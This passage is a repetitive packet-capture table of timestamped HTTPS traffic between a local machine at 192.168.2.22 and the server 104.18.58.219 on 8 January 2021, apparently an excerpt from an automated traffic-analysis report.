                                                        Jan 8, 2021 09:08:31.419220924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419258118 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.419332027 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419375896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419404984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419435978 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419590950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.419604063 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.420284033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.420334101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.420373917 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.420388937 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.420416117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.420473099 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.421232939 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.421276093 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.421314955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.421340942 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.421354055 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.421437025 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.422116995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.422158003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.422194958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.422228098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.422234058 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.422322989 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.423065901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.423118114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.423161983 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.423199892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.423213959 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.423420906 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.423990965 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424027920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424097061 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.424330950 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424372911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424408913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424428940 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.424458027 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.424566984 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.425508022 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.425553083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.425584078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.425614119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.425653934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.426212072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.426255941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.426269054 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.426292896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.426332951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.426336050 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.427206039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.427249908 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.427282095 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.427289963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.427330017 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.427337885 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.428073883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.428117037 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.428133011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.428154945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.428194046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.428198099 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.429035902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.429079056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.429107904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.429128885 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.429147959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.429193974 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.429951906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.429994106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430033922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430054903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.430073023 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430120945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.430850983 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430892944 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430941105 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.430941105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.430984974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.431046009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.431823969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.431868076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.431905985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.431924105 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.431943893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.432009935 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.888505936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.889281988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889312029 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889344931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889365911 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.889374971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.889506102 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.890243053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890269995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890321970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890345097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.890367985 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.890454054 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.891110897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891130924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891146898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891164064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.891201019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892024040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892041922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892054081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892067909 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892119884 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892151117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.892961025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.892982960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893001080 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893018007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.893070936 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.893513918 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.894010067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894052982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894102097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894145966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894160032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.894853115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894877911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894921064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894961119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.894988060 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.895047903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.895792007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895854950 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895906925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.895948887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896003008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.896775007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896815062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896853924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896893024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.896949053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.897654057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897694111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897725105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897756100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.897867918 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.898578882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898618937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898665905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898708105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.898709059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.899527073 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899554014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.899594069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899652958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899684906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.899782896 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.900435925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900480032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900495052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900544882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.900614977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.901365995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901457071 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901483059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.901501894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901551008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.901623011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.902343035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902406931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902457952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902499914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.902565002 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.903254032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903305054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903348923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903363943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.903388977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.903460979 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.904185057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904226065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904264927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904303074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.904324055 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.904364109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.905216932 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905257940 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905302048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905354977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.905373096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.905430079 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.906049013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906091928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906130075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906167984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.906214952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.906985044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907093048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.907229900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907294989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907354116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907444000 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.907927036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.907972097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908010960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908049107 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908068895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.908116102 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.908868074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908919096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908962965 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.908999920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909008026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.909069061 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.909817934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909884930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909924030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909972906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.909998894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.910691023 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910718918 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910747051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910785913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.910825968 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.911643982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911684990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911720991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911758900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.911760092 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.912595987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912636042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912661076 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.912683010 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.912705898 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.931948900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932106018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932131052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932152033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932228088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.932262897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932308912 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.932332039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932354927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932375908 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.932419062 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.933398962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933438063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933459044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.933489084 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.933500051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.934267044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.934351921 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944137096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944169044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944189072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944210052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944277048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944498062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944523096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944541931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944561958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.944587946 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.944602013 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.945442915 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945475101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945496082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945522070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.945528030 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.945647955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.946347952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946419954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946441889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946464062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946487904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.946492910 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.946522951 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.947367907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947391987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947412968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947433949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.947458029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.948281050 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948307991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948328018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948352098 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.948379040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.948389053 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.949289083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949320078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949342012 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949362993 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.949366093 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.950174093 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950198889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950218916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950239897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.950241089 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.950248003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.951085091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951117992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951138020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951142073 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.951158047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.951200008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952004910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952033997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952055931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952068090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952080011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952115059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.952965021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.952995062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953016043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.953027010 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.953037024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.168204069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203418970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203452110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203473091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203494072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203502893 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.203519106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203524113 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.203543901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203560114 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.203783035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203808069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203826904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203835011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.203851938 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203866005 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.203875065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203896999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.203955889 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.204705954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357748032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357779026 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357794046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357814074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357832909 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357846022 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.357918978 CET49177443192.168.2.22104.18.58.219
